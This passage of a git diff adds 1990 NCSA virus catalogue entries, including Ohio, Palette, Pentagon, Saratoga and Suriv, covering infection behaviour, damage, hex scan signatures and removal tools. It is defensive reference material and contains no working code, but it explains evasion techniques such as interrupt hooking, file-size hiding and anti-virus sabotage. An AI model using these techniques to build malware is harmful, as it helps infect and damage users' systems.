system, part of the nVIR +B infection in the application is replaced by part of the nVIR A +infection from the system. The result contains part from each of its +parents, and behaves like nVIR A. + + Similarly, if a system is infected with nVIR B, and if an application +infected with nVIR A is run on that system, part of the nVIR A infection +in the application is replaced by part of the nVIR B infection from the +system. The result is very similar to its sibling described in the +previous paragraph, except that it has the opposite "sex" - each part is +from the opposite parent. It behaves like nVIR B. + + These offspring are new viruses. If they are taken to a clean system +they will infect that system, which will in turn infect other +applications. The descendents are identical to the original offspring. + + Incestual matings of these children with each other and with their +parents produce results that contain various combinations of parts from +their parents. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa101.txt b/textfiles.com/virus/NCSA/ncsa101.txt new file mode 100644 index 00000000..392a7b34 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa101.txt @@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + Ohio + + +Date of Origin: May, 1989. + +Place of Origin: First reported at Ohio State University. May have +originated in Indonesia. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects 360K floppy boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or DOS SYS command. + +Derived from: May be an original. Den Zuk may have been derived from it. + +Scan Code: see below. + + The Ohio virus is a boot sector virus first discovered at Ohio State +University by Terry Reeves in May, 1989. It only infects 360K floppies. +It will infect any new diskette as soon as the diskette is accessed +(COPY, DIR, DEL, program load, etc.), similar to the Brain. The virus +will freeze the system if a <><><> is pressed and a cold +boot is then required. When the virus activates, the first copy of the +FAT becomes corrupted. No other symptoms have been reported. + + The Ohio virus is similar in many respects to the Den Zuk virus, and +may be an early version of Den Zuk. A diskette infected with Ohio will be +immune to infection by the Pakistani Brain virus. + + The following text strings appear in the Ohio virus: + +V I R U S + +b y + +The Hackers + +Y C 1 E R P + +D E N Z U K 0 + +Bandung 40254 + +Indonesia + +(C) 1988, The Hackers Team.... + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa102.txt b/textfiles.com/virus/NCSA/ncsa102.txt new file mode 100644 index 00000000..06c952c9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa102.txt @@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Oropax Virus + + +Synonyms: Music virus, Musician virus. + +Date of Origin: December, 1989. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM files. + +Increase in Size of Infected Files: length increases by 2756-2806 bytes, +so that total length is evenly divisible by 51. Most common length +increase is 2,773 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program +files. + +Detected by: Scanv53+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, SCAN/D, F-Prot, or delete infected files. + + A memory resident virus infecting COM files. When an infected +application is executed, the virus installs in memory trapping the DOS +21h interrupt. Thereafter, when a program attempts to create a +subdirectory, remove a subdirectory, create a file, open a file, delete +a file, get/set file attributes, rename a file, delete a file (with FCB), +create file (with FCB) or rename a file (with FCB), one COM file is +infected in the home directory. COMMAND.COM, COM files with length +divisible by 51, COM files with an attribute other than normal or +archive, or COM files with a length of 61980 bytes will not be infected. +The virus seems to activate randomly after infecting a file. If +activated, five minutes after infection it will play 3 or 6 melodies +(depending on version) repeatedly with a 7 minute interval in between +each. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa103.txt b/textfiles.com/virus/NCSA/ncsa103.txt new file mode 100644 index 00000000..5873e65b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa103.txt @@ -0,0 +1,84 @@ + Ŀ + VIRUS REPORT + Palette Virus + + +Synonyms: Zero Bug virus, 1536 virus + +Date of Origin: September, 1989. + +Place of Origin: The Netherlands + +Host Machine: PC compatibles. + +Host Files: COM files. Memory resident. + +Increase in Size of Infected Files: 1536 bytes. + +Detected by: Scanv38+, F-Prot. + +Removed by: Scan/D, F-Prot, or delete the infected files. + +Scan Code: EB 2B 90 5A 45 CD 60 2E C6 06 25 06 01 90 2E 80 3E 26 06 00 8D +3E 08 06 0E 07 75 5E 2E C6 06 26 06 05 90. + + This virus infects .COM files, causing them to grow by 1536 bytes, +but its main mission is to infect the copy of COMMAND.COM that is pointed +to by the environment variable COMSPEC. If COMSPEC does not point to +anything useful, the virus will install itself as a resident extension, +taking over INT 21h. + + From the moment the virus has infected COMMAND.COM or has installed +itself as a TSR, the virus will intercept DOS INT 21h, function calls 11h +(find first file), 12h (find next file), 57 (get/set file date & time), +3Eh (close file), 40h (write to file or device) and 3Ch (create file). + + All COM files that are accessed via function calls 3Ch, 3Eh and 40h +(by DOS itself or from any other program) will be infected by the virus. +This includes actions like COPY and XCOPY. Any COM file you create by +yourself via a compiler, linker, DEBUG or EXE2BIN will also be infected. + + The extra 1536 bytes in infected files will not show up when you +display a directory of your disk. The virus intercepts DOS function +calls Find First, Find Next and Get/Set file date & time. If a COM file +found by these DOS functions has been infected by the virus, the +information in the DTA (Disk Transfer Area) will be changed to show the +actual filesize minus 1536 bytes. DIR and most full-screen file +utilities (Like Norton and PCTOOLS) will be fooled by this trick. This +makes it very hard to detect the virus by simply checking the size of COM +files, because infected files will show up with their ORIGINAL size! + + If (and only if) the currently loaded COMMAND.COM is infected, the +virus will also hook the timer interrupt 1Ch. After a while a smiley face +(ASCII character 01) will move over your screen and "eat" all zeroes it +can find. Hence the name "Zero Bug" for this virus. The virus does not +format disks or erase files. + + The virus seems not to be spread very widely and may be rather new. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa104.txt b/textfiles.com/virus/NCSA/ncsa104.txt new file mode 100644 index 00000000..bfb2c74e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa104.txt @@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Payday Virus + + +Date of Origin: November, 1989. + +Place of Origin: First isolated in the Netherlands. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM, EXE files. + +Increase in Size of Infected Files: 1808 bytes (EXE files) and 1813 bytes +(COM files). + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv51+, F-Prot. + +Removed by: CleanUp, M-JRUSLM, UnVirus, Saturday, F-Prot. + +Derived from: Jerusalem-B. + + This virus provides a simple change in the Jerusalem B, activating on +any Friday except Friday the 13th, hence the name "Payday". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa105.txt b/textfiles.com/virus/NCSA/ncsa105.txt new file mode 100644 index 00000000..af0eca99 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa105.txt @@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Pentagon Virus + + +Place of Origin: Washington, D.C. + +Host Machine: PC compatibles. + +Host Files: Resident. 360K floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot. + +Removed by: MDisk, CleanUp, or DOS SYS command. + +Scan Code: You can search at offset 03EH for 8E D8 FB BD 44 7C 81 76 06. + + The Pentagon virus consists of: + +* a normal MS-DOS 3.20 boot sector where the name "IBM" has been + replaced by "HAL". + +* A file with the name of the hex character 0F9H. This file contains the + portion of the virus code which would not fit into the boot sector, as + well as the original boot sector of the infected disk. This file is + addressed by its absolute address, rather than name. + +* A file named PENTAGON.TXT that does not appear to be used or contain + any data. Portions of this virus are encrypted. + + The Pentagon virus will look for and remove the Brain virus from any +disk that it infects. It is memory resident, occupying 5K of RAM, and can +survive a warm reboot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa106.txt b/textfiles.com/virus/NCSA/ncsa106.txt new file mode 100644 index 00000000..be057a9d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa106.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Perfume Virus + + +Synonyms: 765, 4711 + +Date of Origin: December, 1989 or earlier. + +Place of Origin: Poland or Germany. + +Host Machine: PC compatibles. + +Host Files: Non-resident. Infects COM files including COMMAND.COM + +Increase in Size of Infected Files: 765 bytes. + +Detected by: Scanv57+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: F-Prot or delete infected files. + +Derived from: Jerusalem + + The virus may ask you a question, and not infect should you answer +the question with "4711", the name of a German perfume. In the most +common version of this virus, however, the questions have been +overwritten with meaningless characters. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa107.txt b/textfiles.com/virus/NCSA/ncsa107.txt new file mode 100644 index 00000000..42dcca42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa107.txt @@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Saratoga Virus + + +Synonyms: 642, One in Two + +Date of Origin: July, 1989 + +Place of Origin: Calfornia + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects EXE files. + +Increase in Size of Infected Files: 642 bytes. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + +Derived from: Icelandic II? + + This virus appears to be derived from the Icelandic-II viruses. +Modifications include: + +* When Saratoga copies itself to memory, it modifies the memory block + so that it appears to belong to the operating system, thus preventing + reuse of the block. + +* Like Icelandic-II, this virus can infect programs which have been + marked Read-Only, though it does not restore the Read-Only attribute + to the file afterwards. + + Similar to the Icelandic-II virus, the Saratoga can infect programs +even if the system has installed an anti-viral TSR which "hooks" +interrupt 21, such as FluShot+. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa108.txt b/textfiles.com/virus/NCSA/ncsa108.txt new file mode 100644 index 00000000..29bb9faf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa108.txt @@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Saturday the 14th virus + + +Synonyms: Durban + +Date of Origin: March, 1990 + +Place of Origin: Durban, South Africa. + +Host Machine: PC compatibles. + +Host Files: COM (but not COMMAND.COM), EXE, and overlay files. Remains +resident. + +Increase in Size of Infected Files: 669-685 bytes. + +Nature of Damage: Overwrites the first 100 sectors of A:, B:, and C:, +destroying the boot sector, partition table, and FATs. + +Detected by: Scan v61+. + +Removed by: Scan/D, or delete whatever is infected. + + Activates on any Saturday the 14th. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa109.txt b/textfiles.com/virus/NCSA/ncsa109.txt new file mode 100644 index 00000000..383bf63b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa109.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + SF Virus + + +Date of Origin: April, 1989. + +Place of Origin: California + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a + +Detected by: Scanv56+ (identifies it as the Alameda). + +Removed by: CleanUp, MDisk, F-Prot, or use the DOS SYS command. + +Derived from: Alameda + + A modification of the Alameda, the SF Virus activates when the +counter indicates it has infected 100 diskettes. The virus replicates +with each warm boot, infecting and reformatting any 360K disk in the +floppy drive. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa110.txt b/textfiles.com/virus/NCSA/ncsa110.txt new file mode 100644 index 00000000..f9c6028c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa110.txt @@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Solano 2000 Virus + + +Synonyms: Dyslexia + +Date of Origin: February, 1990. + +Place of Origin: Solano County, California + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +OnScreen Symptoms: May randomly reverse/transpose contiguous numbers in +the video buffer. + +Increase in Size of Infected Files: 2,000 bytes. + +Nature of Damage: May make infected files unusable. No intentional +damage. + +Detected by: Scanv60+. + +Removed by: Scan/D, or delete whatever is infected. + +Scan Code: Bytes 1168 through 1952 of any infected COM file will contain +"(" -- 28H. + + Once becoming memory resident, Solano will infect every COM file +run. Some infected programs will not run. The current version takes 3K of +RAM and does not survive a warm reboot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa111.txt b/textfiles.com/virus/NCSA/ncsa111.txt new file mode 100644 index 00000000..d5e73846 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa111.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Solano 2000-B Virus + + +Synonyms: Dyslexia + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +OnScreen Symptoms: May transpose some numbers in the video buffer. + +Increase in Size of Infected Files: 2,000 bytes. + +Nature of Damage: May make infected files unusable. + +Detected by: Scanv60+. + +Removed by: Scan/D, or delete whatever is infected. + +Derived from: Solano 2000 + +Scan Code: Bytes 1168 through 1912 of any infected COM file will contain +the character that looks like the upper left corner of a single-line +box -- DA in hex. In other respects, the virus appears to be identical to +Solano 2000. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa112.txt b/textfiles.com/virus/NCSA/ncsa112.txt new file mode 100644 index 00000000..5911ae1b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa112.txt @@ -0,0 +1,45 @@ + Ŀ + VIRUS REPORT + Spanish JB virus + + +Host Machine: PC compatibles. + +Host Files: COM, EXE files. + +OnScreen Symptoms: No "black box" appears on the screen. + +Increase in Size of Infected Files: COM files grow by 1,808 bytes.. EXE +files are re-infected. On the first infection, they may grow by 1,808 or +1,813 bytes. EXEs grow an additional 1,808 bytes with each reinfection. + +Derived from: Jerusalem. + +Scan Code: The "sUMsDos" string does not appear in this virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa113.txt b/textfiles.com/virus/NCSA/ncsa113.txt new file mode 100644 index 00000000..42fd90d5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa113.txt @@ -0,0 +1,48 @@ + Ŀ + VIRUS REPORT + SRI Virus + + +Date of Origin: April, 1989. + +Place of Origin: California + +Host Machine: PC compatibles. + +Detected by: Scanv56+. + +Removed by: CleanUp. + +Derived from: Jerusalem + + The SRI virus, first reported by Bruce Baker at SRI in April, 1989, +is a radical variation of the Jerusalem virus. It takes exactly the same +space, but has been modified extensively. The additions appear to seek +out and destroy anti-viral products. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa114.txt b/textfiles.com/virus/NCSA/ncsa114.txt new file mode 100644 index 00000000..30cdfc3e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa114.txt @@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Sunday virus + + +Date of Origin: November, 1989. + +Place of Origin: Seattle, Washington. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM, EXE, overlay files. + +OnScreen Symptoms: "Today is Sunday, why do you work so hard?", +displayed on any Sunday. + +Increase in Size of Infected Files: 1636 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program or +overlay files. May damage FAT. + +Detected by: Scanv49+, F-Prot. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Jerusalem. + + This virus was discovered by several users in the Seattle, +Washington area. It activates on Sundays and displays the message - +"Today is Sunday, why do you work so hard?". Damage to the FAT sometimes +occurs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa115.txt b/textfiles.com/virus/NCSA/ncsa115.txt new file mode 100644 index 00000000..754b6cdd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa115.txt @@ -0,0 +1,66 @@ + Ŀ + VIRUS REPORT + Suriv01 + + +Synonyms: April 1st (COM infector), Israeli, Suriv 1.01 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +OnScreen Symptoms: "APRIL 1ST HA HA HA YOU HAVE A VIRUS" displayed on +April 1st. + +Increase in Size of Infected Files: 897 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or UnVirus. + +Derived from: Original. The Jerusalem is derived from it. + +Scan Code: 89 26 34 01 B4 19 CD 21 04 41 2E A2 65 03 2E A2 B1 03 BF 67 03 +57 8B F2 80 7C 01 3A 75 0D 8A 04 2E A2 65 03 2E A2 B1 03. You can also +search at offset 30AH for 81 F9 C4 07 72 1B 81 FA 01 04. + + Suriv01 and Suriv02 appeared at about the same time, first +discovered in Israel. They were shortly merged into one virus, (Suriv03) +which evolved into the well-known Jerusalem virus. That virus was then +used as a basis for the Fu Manchu virus. + + On April 1, if an infected program is run, it will display the +message "APRIL 1ST HA HA HA YOU HAVE A VIRUS", then lock up the system. +This virus contains the identifying text string "sURIV 1.01". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa116.txt b/textfiles.com/virus/NCSA/ncsa116.txt new file mode 100644 index 00000000..d3799690 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa116.txt @@ -0,0 +1,68 @@ + Ŀ + VIRUS REPORT + Suriv02 + + +Synonyms: April 1st-B, Suriv 2.01 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: None. + +Increase in Size of Infected Files: 1488 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, UnVirus. + +Derived from: Suriv01. + +Scan Code: You can search at offset 05EH for 81 F9 C4 07 72 28 81 FA 01 +04. + + This virus is identical to Suriv01, except: + +* It only infects EXE files. + +* It displays no on-screen message. + +* The machine locks one hour after infection if the default date of + 1-1-80 is used. + + It is triggered the first time an infected file is run on April 1. +The virus infects an EXE file only once. The identifying string is +"sURIV 2.01". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa117.txt b/textfiles.com/virus/NCSA/ncsa117.txt new file mode 100644 index 00000000..2c4ce124 --- /dev/null +++ 